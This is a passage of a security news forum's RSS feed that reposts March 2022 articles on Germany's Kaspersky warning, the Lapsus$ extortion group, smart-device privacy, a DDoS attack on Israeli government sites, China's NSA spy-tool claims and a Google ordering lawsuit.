	<a href="https://www.ghacks.net/2022/03/15/virus-scanning-service-virustotal-releases-vt4browsers-extension-for-chrome-and-firefox/" rel="external nofollow">Virus scanning service VirusTotal releases VT4Browsers extension for Chrome and Firefox</a>
</p>
]]></description><guid isPermaLink="false">4749</guid><pubDate>Tue, 15 Mar 2022 19:55:36 +0000</pubDate></item><item><title>German government advises against using Kaspersky antivirus</title><link>https://nsaneforums.com/news/security-privacy-news/german-government-advises-against-using-kaspersky-antivirus-r4748/</link><description><![CDATA[<p>
	Germany's Federal Office for Information Security, BSI, is warning companies against using Kaspersky antivirus products due to threats made by Russia against the EU, NATO, and Germany.
</p>

<p>
	 
</p>

<p>
	Kaspersky is a Moscow-based cybersecurity and antivirus provider founded in 1997 that has a long history of success, but also controversy over the company's possible <a href="https://www.bleepingcomputer.com/news/security/kaspersky-denies-report-it-might-help-russian-government-spy-on-us-citizens/" target="_blank" rel="external nofollow">relationship with the Russian government</a>.
</p>

<p>
	 
</p>

<p>
	Kaspersky's founder and CEO, Eugene Kaspersky, recently expressed a wish for "compromise" regarding Russia's invasion of Ukraine, which sparked outrage on Twitter, with many rejecting the firm's stance on the matter.
</p>

<p>
	 
</p>

<p>
	<img alt="kaspersky-tweet.jpg" class="ipsImage" data-ratio="75.10" height="503" width="720" src="https://www.bleepstatic.com/images/news/government/g/germany/bsi/kaspersky/kaspersky-tweet.jpg">
</p>

<p>
	 
</p>

<p>
	Kaspersky is also believed to offer its cybersecurity protection services to <a href="https://twitter.com/Lexcor1/status/1498623436716916737" rel="external nofollow" target="_blank">Russian state IT infrastructure</a>, making it a concern that the company cannot stay completely neutral.
</p>

<h2>
	BSI warns against using Kaspersky
</h2>

<p>
	Today, the BSI is warning German companies to replace Kaspersky AV and any other products from the firm with alternative software from non-Russian vendors.
</p>

<p>
	 
</p>

<p>
	As the <a href="http://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html" rel="external nofollow" target="_blank">BSI statement explains</a>, antivirus software typically has higher-level privileges on Windows systems, maintaining a permanent, encrypted, and non-verifiable connection to the vendor’s servers for constant virus definition updates.
</p>

<p>
	 
</p>

<p>
	Furthermore, as real-time protection from almost all antivirus vendors can upload suspicious files to remote servers for further analysis, there is concern that antivirus developers could use their software to exfiltrate sensitive files.
</p>

<p>
	 
</p>

<p>
	While Kaspersky is likely trustworthy and ethical, it still has to abide by Russian laws and regulations, including allowing state agents to access private firm databases.
</p>

<p>
	 
</p>

<p>
	BSI is taking this further by suggesting that Kaspersky could be forced into aiding the Russian intelligence forces in carrying out cyberattacks or conducting espionage.
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	"The actions of military and/or intelligence forces in Russia and the threats made by Russia against the EU, NATO and the Federal Republic of Germany in the course of the current military conflict are associated with a considerable risk of a successful IT attack. A Russian IT manufacturer can carry out offensive operations itself, be forced to attack target systems against its will, or be spied on without its knowledge as a victim of a cyber operation, or be misused as a tool for attacks against its own customers."
</p>

<p>
	 
</p>

<p>
	<strong>BSI</strong>
</p>

<p>
	 
</p>

<p>
	To avoid panic moves like switching off protection without activating a replacement security product, BSI advises all organizations to prepare accordingly by first performing a complete assessment.
</p>

<p>
	 
</p>

<p>
	Also, whenever a switch to alternative security products takes place, loss of comfort, functionality, and even safety is expected, so a remediation plan to address all that must be developed.
</p>

<p>
	 
</p>

<p>
	This warning has already led German organizations, such as <a href="https://en.eintracht.de/news/eintracht-beendet-partnerschaft-mit-kaspersky-140037" rel="external nofollow" target="_blank">Germany's Eintracht sports club</a>, to stop using Kaspersky's services.
</p>

<p>
	 
</p>

<p>
	However, Kaspersky believes that BSI's warning to remove Kaspersky products is a political decision rather than a technical assessment of their products.
</p>

<p>
	 
</p>

<p>
	A Kaspersky spokesperson shared the following statement with BleepingComputer regarding BSI's warning, reproduced in full below:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	We believe this decision is not based on a technical assessment of Kaspersky products – that we continuously advocated for with the BSI and across Europe – but instead is being made on political grounds. We will continue to assure our partners and customers of the quality and integrity of our products, and we will be working with the BSI for clarification on its decision and for the means to address its and other regulators’ concerns.
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	At Kaspersky, we believe that transparency and the continued implementation of concrete measures to demonstrate our enduring commitment to integrity and trustworthiness to our customers are paramount. Kaspersky is a private global cybersecurity company and, as a private company, does not have any ties to the Russian or any other government.
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	We believe that peaceful dialogue is the only possible instrument for resolving conflicts. War isn’t good for anyone.
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	Our data processing infrastructure was relocated to Switzerland in 2018: since then, malicious and suspicious files voluntarily shared by users of Kaspersky products in Germany are processed in two data centers in Zurich that provide world-class facilities, in compliance with industry standards, to ensure the highest levels of security. Beyond our cyberthreat-related data processing facilities in Switzerland, statistics provided by users to Kaspersky can be processed on the Kaspersky Security Network’s services located in various countries around the world, including Canada and Germany. The security and integrity of our data services and engineering practices have been confirmed by independent third-party assessments: through the SOC 2 Audit conducted by a ‘Big Four’ auditor, and through the ISO 27001 certification and recent re-certification by TÜV Austria.
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	Kaspersky has set the industry benchmark for digital trust and transparency. Our customers can run a free technical and comprehensive review of our solutions, allowing them to:
</p>

<p style="margin-left: 40px;">
	 
</p>

<ul>
	<li>
		<p style="margin-left: 40px;">
			Review our secure software development documentation including threat analysis, secure review, and application security testing processes
		</p>
	</li>
	<li>
		<p style="margin-left: 40px;">
			Review the source code of our leading solutions including Kaspersky Internet Security (KIS), our flagship consumer product; Kaspersky Endpoint Security (KES), our flagship enterprise product; and Kaspersky Security Center (KSC), a control console for our enterprise products
		</p>
	</li>
	<li>
		<p style="margin-left: 40px;">
			Review all versions of our builds and AV-database updates, as well as the types of information which Kaspersky products send to our cloud-based Kaspersky Security Network (KSN)
		</p>
	</li>
	<li>
		<p style="margin-left: 40px;">
			Rebuild the source code to make sure it corresponds to publicly available modules
		</p>
	</li>
	<li>
		<p style="margin-left: 40px;">
			Review the results of an external audit of the company’s engineering practices conducted by one of the ‘Big Four’ accounting firms
		</p>
	</li>
	<li>
		<p style="margin-left: 40px;">
			Review the Software Bill of Materials (SBOM) for Kaspersky Internet Security (KIS), Kaspersky Endpoint Security (KES), and Kaspersky Security Center (KSC)
		</p>
	</li>
</ul>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/german-government-advises-against-using-kaspersky-antivirus/" rel="external nofollow">German government advises against using Kaspersky antivirus</a>
</p>
]]></description><guid isPermaLink="false">4748</guid><pubDate>Tue, 15 Mar 2022 19:51:40 +0000</pubDate></item><item><title>The Lapsus$ Hacking Group Is Off to a Chaotic Start</title><link>https://nsaneforums.com/news/security-privacy-news/the-lapsus-hacking-group-is-off-to-a-chaotic-start-r4747/</link><description><![CDATA[<p>
	Ransomware gangs have <a href="https://www.wired.com/story/ransomware-gone-corporate-darkside-where-will-it-end/" rel="external nofollow">become well-oiled moneymaking machines</a> in their quest for criminal profit. But since December, a seemingly new group called Lapsus$ has added chaotic energy to the field, cavorting about with a strong social media presence on <a href="https://www.wired.com/story/how-telegram-became-anti-facebook/" rel="external nofollow">Telegram</a>, a string of high-profile victims—including Samsung, Nvidia, and Ubisoft—calamitous leaks, and dramatic accusations that add up to a reckless escalation in <a href="https://www.wired.com/story/ransomware-2020-headed-down-dire-path/" rel="external nofollow">an already unlawful industry</a>.
</p>

<p>
	 
</p>

<p>
	What makes Lapsus$ noteworthy, too, is that the group isn't really a ransomware gang. Instead of exfiltrating data, encrypting target systems, and then <a href="https://www.wired.com/story/apple-ransomware-attack-quanta-computer/" rel="external nofollow">threatening to leak the stolen information</a> unless the victim pays up, Lapsus$ seems to exclusively focus on the data theft and extortion. The group gains access to victims through phishing attacks, then steals the most sensitive data it can find without deploying data-encrypting malware.
</p>

<p>
	 
</p>

<p>
	“It’s all been quite erratic and unusual,” says Brett Callow, a threat analyst at the antivirus company Emsisoft. “My sense is that they are a talented but inexperienced operation. Whether they will seek to expand and bring on affiliates or keep it small and lean remains to be seen.”
</p>

<p>
	 
</p>

<p>
	Lapsus$ emerged just a few months ago, at first focused almost exclusively on Portuguese-language targets. In December and January, the group hacked and attempted to extort Brazil’s health ministry, the Portuguese media giant Impresa, the South American telecoms Claro and Embratel, and Brazilian car rental company Localiza, among others. In some cases, Lapsus$ also mounted denial-of-service attacks against victims, making their sites and services unavailable for a period of time. 
</p>

<p>
	 
</p>

<p>
	Even in those early campaigns, Lapsus$ got creative; it set Localiza's website to redirect to an adult media site for a couple of hours until the company could revert it. 
</p>

<p>
	 
</p>

<p>
	As the attackers have ramped up and gained confidence, they've expanded their reach. In recent weeks, the group has hit Argentine ecommerce platforms MercadoLibre and MercadoPago, claims to have breached the British telecom Vodafone, and has begun leaking sensitive and valuable source code from Samsung and Nvidia. 
</p>

<p>
	 
</p>

<p>
	“Remember: The only goal is money, our reasons are not political,” Lapsus$ wrote in its Telegram channel in early December. And when the group announced its Nvidia breach on Telegram at the end of February, it added, “Please note: We are not state sponsored and we are not in politics AT ALL.”
</p>

<p>
	 
</p>

<p>
	Researchers say, though, that the truth about the gang's intentions is murkier. Unlike many of the most <a href="https://www.wired.com/story/trickbot-malware-group-internal-messages/" rel="external nofollow">prolific ransomware groups</a>, Lapsus$ seems to be more of a loose collective than a disciplined, corporatized operation. “At this point it's difficult to say with certainty what the group’s motivations are,” says Xue Yin Peh, a senior cyber-threat intelligence analyst at the security firm Digital Shadows. “There are no indications yet that the group uses ransomware to extort victims, so we can’t confirm that they’re financially motivated.”
</p>

<p>
	 
</p>

<p>
	Lapsus$ breached Nvidia in mid-February, stealing 1 terabyte of data, including a significant amount of sensitive information about the designs of Nvidia graphics cards, source code for an Nvidia AI rendering system called DLSS, and the usernames and passwords of more than 71,000 Nvidia employees. The group threatened to release more and more data if Nvidia didn't meet a series of unusual demands. At first the gang told the chipmaker to remove an anti-crypto-mining feature called Lite Hash Rate from its GPUs. Then Lapsus$ demanded that the company release certain drivers for its chips.
</p>

<p>
	 
</p>

<p>
	“The focus on cryptocurrency mining suggests that the group may ultimately be financially driven, however they are certainly taking a different approach than other groups in soliciting financial rewards,” Digital Shadows' Peh says.
</p>

<p>
	 
</p>

<p>
	In a tumultuous turn, Lapsus$ also accused Nvidia of “hacking back”—lashing out against the group in retaliation for the attacks. A source close to the Nvidia incident disputed the claims, though, telling WIRED that the company did not hack back or deploy malware against Lapsus$.
</p>

<p>
	 
</p>

<p>
	“It's difficult to say. The only source we've had for it is the ransomware group themselves,” says independent security researcher Bill Demirkapi of the claims. “The explanation they gave for how Nvidia hacked back does make sense, but I always take such statements with a grain of salt, because Lapsus$ has an incentive to make Nvidia look as bad as possible.”
</p>

<p>
	 
</p>

<p>
	Nvidia said in a statement that it learned about the breach on February 23 and quickly “further hardened our network, engaged cybersecurity incident response experts, and notified law enforcement.” The company acknowledged that the attackers stole employee authentication credentials and some proprietary data.
</p>

<p>
	 
</p>

<p>
	In a blithe, even rash move, Lapsus$ also included two sensitive Nvidia code-signing certificates in its leaks. Other attackers quickly abused them to make their malware look more authentic and trustworthy in certain scenarios. 
</p>

<p>
	 
</p>

<p>
	“This group operates on street cred and clout,” says Charles Carmakal, senior vice president and chief technical officer of the cybersecurity firm Mandiant. “They're bragging to their friends, and if they get money, they'll take it, but money doesn't seem to be the sole or even primary driver. So a victim company that wants to negotiate with them and may think about paying them likely won’t get the outcome they’re hoping for.”
</p>

<p>
	 
</p>

<p>
	That thirst for notoriety makes Lapsus$ particularly reckless and disruptive. While they don’t encrypt systems, Lapsus$ has deleted files and virtual machines, and generally caused “a whole lot of chaos,” as Carmakal puts it.
</p>

<p>
	 
</p>

<p>
	Just a few days after it began leaking Nvidia data, Lapsus$ also announced that it had stolen 190 gigabytes of data from Samsung, including boot-loader source code and algorithms for the Galaxy smartphone line's biometric authentication system. Samsung <a href="https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code" rel="external nofollow" target="_blank">confirmed</a> last week that it suffered a breach.
</p>

<p>
	 
</p>

<p>
	A few days later, Ubisoft joined the fray. “Last week, Ubisoft experienced a cyber security incident that caused temporary disruption to some of our games, systems, and services,” the company wrote in a <a href="https://news.ubisoft.com/en-gb/article/3tSsBh25mhHhlbGSy1xbRw/ubisoft-cyber-security-incident-update?utm_source=narrativ" rel="external nofollow" target="_blank">statement</a> on Thursday. “As a precautionary measure we initiated a company-wide password reset … There is no evidence any player personal information was accessed or exposed as a by-product of this incident.”
</p>

<p>
	 
</p>

<p>
	Specific details about the group remain scarce for now. Researchers suspect that Lapsus$ is based in South America, potentially in Brazil, and say it may have a few members in Europe as well, perhaps in Portugal. Lapsus$ doesn't have a homepage on the dark web for posting samples of leaked data and negotiating with victims. Instead, in an unorthodox move for ransomware groups, the gang uses Telegram for most of its public-facing operations.
</p>

<p>
	 
</p>

<p>
	“One unusual tendency of Lapsus$ is their use of Telegram to broadcast victims’ identities,” Digital Shadows' Peh says. “Abusing a legitimate tool like Telegram ensures Lapsus$’s data leak channel will see minimum disruption, and that their victims’ identities can be exposed to anyone with an internet connection.”
</p>

<p>
	 
</p>

<p>
	One of Lapsus$'s trademark antics is to run polls on its Telegram channel where onlookers can vote for whose data the gang should publish next.
</p>

<p>
	 
</p>

<p>
	“It’s very reminiscent of the Lulzsec folks and even Anonymous back in the day,” Mandiant's Carmakal says of the two hacktivist collectives that rose to prominence in the early 2010s. “Those folks had political motivations, or pretended to, but were also doing it for the fame and glory, and Lulzsec in particular was more overt about doing it for fun. With Lapsus$ it's a very dangerous thing for people to do for fun, and they will be arrested at some point in time.”
</p>

<p>
	 
</p>

<p>
	In the meantime, though, the question for Big Tech is, who will be in Lapsus$'s crosshairs next? It seems that no target is too big or influential to be out of reach—and that the demands may be just as hard to predict.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/lapsus-hacking-group-extortion-nvidia-samsung/" rel="external nofollow">The Lapsus$ Hacking Group Is Off to a Chaotic Start</a>
</p>

<p>
	 
</p>

<p>
	(May require free registration to view)
</p>
]]></description><guid isPermaLink="false">4747</guid><pubDate>Tue, 15 Mar 2022 19:47:50 +0000</pubDate></item><item><title>Smart Devices Are Spying on You Everywhere, And That's a Problem</title><link>https://nsaneforums.com/news/security-privacy-news/smart-devices-are-spying-on-you-everywhere-and-thats-a-problem-r4734/</link><description><![CDATA[<p>
	Have you ever felt a creeping sensation that someone's watching you? Then you turn around and you don't see anything out of the ordinary.
</p>

<p>
	 
</p>

<p>
	Depending on where you were, though, you might not have been completely imagining it. There are billions of things sensing you every day. They are everywhere, hidden in plain sight – inside your TV, fridge, car and office. These things know more about you than you might imagine, and many of them communicate that information over the internet.
</p>

<p>
	 
</p>

<p>
	Back in 2007, it would have been hard to imagine the revolution of useful apps and services that smartphones ushered in. But they came with a cost in terms of intrusiveness and loss of privacy.
</p>

<p>
	 
</p>

<p>
	As computer scientists who study data management and privacy, we find that with internet connectivity extended to devices in homes, offices and cities, privacy is in more danger than ever.
</p>

<p>
	 
</p>

<p>
	<strong>Internet of Things</strong>
</p>

<p>
	Your appliances, car and home are designed to make your life easier and automate tasks you perform daily: switch lights on and off when you enter and exit a room, remind you that your tomatoes are about to go bad, personalize the temperature of the house depending on the weather and preferences of each person in the household.
</p>

<p>
	 
</p>

<p>
	To do their magic, they need the internet to reach out for help and correlate data. Without internet access, your smart thermostat can collect data about you, but it doesn't know what the weather forecast is, and it isn't powerful enough to process all of the information to decide what to do.
</p>

<p>
	 
</p>

<p>
	But it's not just the things in your home that are communicating over the internet. Workplaces, malls and cities are also becoming smarter, and the smart devices in those places have similar requirements.
</p>

<p>
	 
</p>

<p>
	In fact, the Internet of Things (IoT) is already widely used in transport and logistics, agriculture and farming, and industry automation. There were around 22 billion internet-connected devices in use around the world in 2018, and the number is projected to grow to over 50 billion by 2030.
</p>

<p>
	 
</p>

<p>
	<strong>What these things know about you</strong>
</p>

<p>
	Smart devices collect a wide range of data about their users. Smart security cameras and smart assistants are, in the end, cameras and microphones in your home that collect video and audio information about your presence and activities.
</p>

<p>
	 
</p>

<p>
	On the less obvious end of the spectrum, things like smart TVs use cameras and microphones to spy on users, smart lightbulbs track your sleep and heart rate, and smart vacuum cleaners recognize objects in your home and map every inch of it.
</p>

<p>
	 
</p>

<p>
	Sometimes, this surveillance is marketed as a feature. For example, some Wi-Fi routers can collect information about users' whereabouts in the home and even coordinate with other smart devices to sense motion.
</p>

<p>
	 
</p>

<p>
	Manufacturers typically promise that only automated decision-making systems and not humans see your data. But this isn't always the case. For example, Amazon workers listen to some conversations with Alexa, transcribe them and annotate them, before feeding them into automated decision-making systems.
</p>

<p>
	 
</p>

<p>
	But even limiting access to personal data to automated decision-making systems can have unwanted consequences. Any private data that is shared over the internet could be vulnerable to hackers anywhere in the world, and few consumer internet-connected devices are very secure.
</p>

<p>
	 
</p>

<p>
	<strong>Understand your vulnerabilities</strong>
</p>

<p>
	With some devices, like smart speakers or cameras, users can occasionally turn them off for privacy. However, even when this is an option, disconnecting the devices from the internet can severely limit their usefulness.
</p>

<p>
	 
</p>

<p>
	You also don't have that option when you're in workspaces, malls or smart cities, so you could be vulnerable even if you don't own smart devices.
</p>

<p>
	 
</p>

<p>
	Therefore, as a user, it is important to make an informed decision by understanding the trade-offs between privacy and comfort when buying, installing and using an internet-connected device.
</p>

<p>
	 
</p>

<p>
	This is not always easy. Studies have shown that, for example, owners of smart home personal assistants have an incomplete understanding of what data the devices collect, where the data is stored and who can access it.
</p>

<p>
	 
</p>

<p>
	Governments all over the world have introduced laws to protect privacy and give people more control over their data. Some examples are the European General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA).
</p>

<p>
	 
</p>

<p>
	Thanks to this, for instance, you can submit a Data Subject Access Request (DSAR) to the organization that collects your data from an internet-connected device. Organizations within those jurisdictions are required to respond within a month, explaining what data is collected, how it is used within the organization and whether it is shared with any third parties.
</p>

<p>
	 
</p>

<p>
	<strong>Limit the privacy damage</strong>
</p>

<p>
	Regulations are an important step; however, their enforcement is likely to take a while to catch up with the ever-increasing population of internet-connected devices. In the meantime, there are things you can do to take advantage of some of the benefits of internet-connected devices without giving away an inordinate amount of personal data.
</p>

<p>
	 
</p>

<p>
	If you own a smart device, you can take steps to secure it and minimize risks to your privacy.
</p>

<p>
	 
</p>

<p>
	The Federal Trade Commission offers suggestions on how to secure your internet-connected devices. Two key steps are updating the device's firmware regularly and going through its settings and disabling any data collection that is not related to what you want the device to do. The Online Trust Alliance provides additional tips and a checklist for consumers to ensure safe and private use of consumer internet-connected devices.
</p>

<p>
	 
</p>

<p>
	If you are on the fence about purchasing an internet-connected device, find out what data it captures and what the manufacturer's data management policies are from independent sources such as Mozilla's Privacy Not Included. By using this information, you can opt for a version of the smart device you want from a manufacturer that takes the privacy of its users seriously.
</p>

<p>
	 
</p>

<p>
	Last but not least, you can pause and reflect on whether you really need all your devices to be smart. For example, are you willing to give away information about yourself to be able to verbally command your coffee machine to make you a coffee?
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.sciencealert.com/the-internet-of-things-is-probably-violating-your-privacy-here-s-how" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">4734</guid><pubDate>Tue, 15 Mar 2022 15:23:56 +0000</pubDate></item><item><title>Massive DDoS Attack Knocked Israeli Government Websites Offline</title><link>https://nsaneforums.com/news/security-privacy-news/massive-ddos-attack-knocked-israeli-government-websites-offline-r4733/</link><description><![CDATA[<p>
	A number of websites belonging to the Israeli government were felled in a distributed denial-of-service (DDoS) attack on Monday, rendering the portals inaccessible for a short period of time.
</p>

<p>
	 
</p>

<p>
	"In the past few hours, a DDoS attack against a communications provider was identified," the Israel National Cyber Directorate (INCD) said in a tweet. "As a result, access to several websites, among them government websites, was denied for a short time. As of now, all of the websites have returned to normal activity."
</p>

<p>
	 
</p>

<p>
	A distributed denial-of-service attack is a malicious attempt to hamper the normal traffic of a targeted server or service by overwhelming the victim and its surrounding infrastructure with a flood of junk internet traffic, typically generated by compromised computers and IoT devices that serve as the sources of the attack traffic.
</p>

<p>
	 
</p>

<p>
	The development comes after internet watchdog NetBlocks reported "significant disruptions" registered on multiple networks supplied by Israel's telecom providers Bezeq and Cellcom.
</p>

<p>
	 
</p>

<p>
	The INCD has not pinned the attacks on a specific threat actor, but The Jerusalem Post alluded to the possibility that the incident could have been the work of an Iranian-affiliated hacker group in retaliation for the alleged attempted sabotage of the nation's Fordow nuclear enrichment plant.
</p>

<p>
	 
</p>

<p>
	This is not the first time DDoS attacks have been mounted against government IT infrastructure, what with the ongoing Russo-Ukrainian war paving the way for a series of "tit-for-tat" DDoS attack campaigns on both sides.
</p>

<p>
	 
</p>

<p>
	On top of that, a vulnerability in Mitel MiCollab and MiVoice Business Express collaboration systems was recently weaponized to carry out sustained distributed denial-of-service (DDoS) attacks for up to 14 hours with a record-breaking amplification ratio of 4.3 billion to 1.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2022/03/massive-ddos-attack-knocked-israeli.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">4733</guid><pubDate>Tue, 15 Mar 2022 15:00:35 +0000</pubDate></item><item><title><![CDATA[China claims it’s captured US NSA spy tool dubbed Trojan horse that can ‘control global internet equipment & steal info’]]></title><link>https://nsaneforums.com/news/security-privacy-news/china-claims-it%E2%80%99s-captured-us-nsa-spy-tool-dubbed-trojan-horse-that-can-%E2%80%98control-global-internet-equipment-steal-info%E2%80%99-r4725/</link><description><![CDATA[<p>
	<strong>CHINA claims to have captured a US National Security Agency spy tool dubbed Trojan horse that can allegedly control global internet equipment and steal information.</strong>
</p>

<p>
	 
</p>

<p>
	The alleged NSA spy tool is capable of lurking in a victim's computer and accessing sensitive information, according to the Chinese outlet Global Times.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="NINTCHDBPICT000718884785.jpg?w=670" class="ipsImage" data-ratio="64.63" height="433" width="670" src="https://www.the-sun.com/wp-content/uploads/sites/6/2022/03/NINTCHDBPICT000718884785.jpg?w=670" />
</p>

<p style="text-align:center;">
	<span style="font-size:11px;"><em>The US National Security Agency have not confirmed or commented on the alleged hacking claims</em></span>
</p>

<p style="text-align:center;">
	<span style="font-size:11px;"><em>Credit: AFP - Getty</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p>
	A report obtained by the outlet from the National Computer Virus Emergency Response Center (NCVERC) claims the tool, dubbed Trojan horse, or NOPEN, is a remote control tool for Unix/Linux computer systems.
</p>

<p>
	 
</p>

<p>
	The instrument can allegedly remotely control existing network servers and terminals, which attackers can implant either manually or through the NSA's cyberattack platforms, the outlet reported, citing the NCVERC report.
</p>

<p>
	 
</p>

<p>
	According to the Chinese outlet, the tool is "mainly used to steal files, access systems, redirect network communication, and view a target device's information."
</p>

<p>
	 
</p>

<p>
	The spy system has reportedly controlled global internet equipment and stolen large amounts of users' information.
</p>

<p>
	 
</p>

<p>
	Cybersecurity experts told the outlet that once the Trojan is planted into a victim's computer, it would "become a 'lurker' waiting for the 'code' and opening the 'vault door' for hackers."
</p>

<p>
	 
</p>

<p>
	The tool can also allegedly turn a victim's computer into a bridge tower, allowing hackers to go deeper into the group where the victim works and grasp the company's information.
</p>

<p>
	 
</p>

<p>
	The Trojan horse is allegedly one of the most potent weapons used by the NSA's Tailored Access Operations (TAO) to attack and steal secrets, the outlet reported citing internal NSA documents leaked by the hacking group Shadow Brokers.
</p>

<p>
	 
</p>

<p>
	Despite the claims, there has been no confirmation by US officials on the alleged hack or of the tool's existence.
</p>

<p>
	 
</p>

<p>
	The NSA did not immediately respond to a request for comment from The US Sun.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.the-sun.com/tech/4888350/china-claims-captured-us-nsa-spy-tool/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">4725</guid><pubDate>Mon, 14 Mar 2022 20:43:18 +0000</pubDate></item><item><title>Google &#x201C;hijacked millions of customers and orders&#x201D; from restaurants, lawsuit says</title><link>https://nsaneforums.com/news/security-privacy-news/google-%E2%80%9Chijacked-millions-of-customers-and-orders%E2%80%9D-from-restaurants-lawsuit-says-r4717/</link><description><![CDATA[<p>
	<strong>Restaurants say blue “order online” button saps profits, diverts customers.</strong>
</p>

<p>
	 
</p>

<p>
	Google is being sued by a Florida restaurant group alleging that the tech company has been setting up unauthorized pages to capture food orders rather than directing them to the restaurant’s own site.
</p>

<p>
	 
</p>

<p>
	Google uses “bait-and-switch” tactics to get customers to place takeout or pickup orders through “new, unauthorized, and deceptively branded webpages,” according to the lawsuit, filed on behalf of Left Field Holdings, a restaurant company that runs Lime Fresh Mexican Grill franchises. On those pages, customers are prompted with large buttons to order with food delivery companies like GrubHub, DoorDash, or Seamless.
</p>

<p>
	 
</p>

<p>
	“Google never bothered to obtain permission from the restaurants to sell their products online,” the lawsuit says. “Google purposefully designed its websites to appear to the user to be offered, sponsored, and approved by the restaurant, when they are not—a tactic, no doubt, employed by Google to increase orders and clicks.”
</p>

<p>
	 
</p>

<p>
	In a statement to Ars, Google disputed “the mischaracterizations of our product” and said it would be defending itself against the lawsuit. “Our goal is to connect customers with restaurants they want to order food from and make it easier for them to do it through the ‘Order Online’ button,” spokesperson José Castañeda told Ars. “We provide tools for merchants to indicate whether they support online orders or prefer a specific provider, including their own ordering website. We do not receive any compensation for orders or integrations with this feature.”
</p>

<p>
	 
</p>

<p>
	<strong>Google acquisition</strong>
</p>

<p>
	The “Order Online” button appears to be the result of a Google acquisition known as “The Ordering App,” a site that was originally marketed toward restaurants. “The Ordering app is an online ordering platform, powered by Google, and designed specifically for Restaurants to help customers order more seamlessly from the Google Business Profile,” the product’s Salesforce page says. While The Ordering App was initially set up to take a percentage of sales, Google waived it “to help support restaurants affected during the COVID-19 pandemic.”
</p>

<p>
	 
</p>

<p>
	It’s not clear when The Ordering App or the “Order Online” button changed tack or if it ever did—there’s very little information about the acquisition or the product that’s public—but the lawsuit alleges that at some point Google decided to market it to food delivery companies instead of restaurants.
</p>

<p>
	 
</p>

<p>
	Before the “Order Online” button appeared, Google search result pages for restaurant queries looked like many others do—a list of organic results accompanied by text ads. Then, in 2019, Google started rolling out the new button, which appears prominently in what the company calls the Business Profile, a collection of information about a business that appears alongside search results.
</p>

<p>
	 
</p>

<p>
	When users click the “Order Online” button, they’re directed to a page that in many cases contains large links to food delivery companies, complete with their logos. The restaurant’s own site gets a link as well, though it’s a small, generic “website” button. In some cases, Google provides an interface for assembling an order, complete with prices and descriptions of the menu items.
</p>

<p>
	 
</p>

<p>
	Companies that have completed the “Order Online” setup with Google can also direct customers to their own online ordering services. Yet because many restaurants’ ordering sites are run by third parties, those links may not contain a restaurant’s name. In the case of Cambridge, Massachusetts, cafe Flour Bakery, for example, the option to order directly appears as “thelevelup.com”.
</p>

<p>
	If restaurants haven’t completed the setup, Google appears to create a page anyway. It’s unclear how that happens, though it’s possible that a restaurant’s appearance in a delivery app is what triggers it. That isn’t always a sign of a business relationship between the restaurant and food delivery company, though. Many food delivery companies have been sued for adding restaurants without their consent.
</p>

<p>
	 
</p>

<p>
	“Google’s ‘Order Online’ button leads to an unauthorized online storefront—one owned and controlled by Google—wherein consumers can place orders for the restaurant’s products, all under the restaurant’s tradename,” the lawsuit says. “Google prominently features the restaurant’s tradename at the top of the page, above the restaurant’s address and menu, to give the user the distinct impression that the storefront and products are authorized and sponsored by the restaurant, when they are not.”
</p>

<p>
	 
</p>

<p>
	<strong>Food delivery app fees</strong>
</p>

<p>
	If the restaurant has a relationship with the food delivery company, it gets charged a fee. These fees can be so high—15 to 30 percent in many cases—that the restaurant has no hope of making a profit from the order. “A restaurant's motivation to partner with a Delivery Provider is almost never to make a profit on orders received from the Delivery Provider,” the complaint says. “Rather, a restaurant’s usual goal is to capture new customers that may later place orders with the restaurant outside of the Delivery Providers’ expensive platforms.”
</p>

<p>
	 
</p>

<p>
	But, the lawsuit says, because of the way Google’s “Order Online” feature is designed, it limits restaurants’ chances of taking orders directly.
</p>

<p>
	 
</p>

<p>
	Given the number of restaurants in the US, the lawyers representing Left Field Holdings are seeking class action, saying they believe there are “tens of thousands” of potential plaintiffs. “Since launching its unauthorized Storefront, Google has hijacked millions of customers and orders,” the lawsuit alleges.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://arstechnica.com/tech-policy/2022/03/google-hijacked-millions-of-customers-and-orders-from-restaurants-lawsuit-says/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">4717</guid><pubDate>Mon, 14 Mar 2022 13:49:58 +0000</pubDate></item><item><title>Firefox Relay update brings larger attachment sizes and a filter for promotional emails</title><link>https://nsaneforums.com/news/security-privacy-news/firefox-relay-update-brings-larger-attachment-sizes-and-a-filter-for-promotional-emails-r4701/</link><description><![CDATA[<p>
	<a data-wpel-link="external" href="https://relay.firefox.com/" rel="external nofollow" target="_blank">Firefox Relay by Mozilla</a> is an email forwarding service that is designed to improve user privacy and reduce the amount of spam users get. Mozilla published an update in March 2022 that raises the attachment size limit and introduces a filter for promotional content to the service.
</p>

<p>
	 
</p>

<p>
	<img alt="firefox-relay-ui-scaled.webp" class="ipsImage" data-ratio="75.10" height="510" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/03/firefox-relay-ui-scaled.webp">
</p>

<p>
	 
</p>

<p>
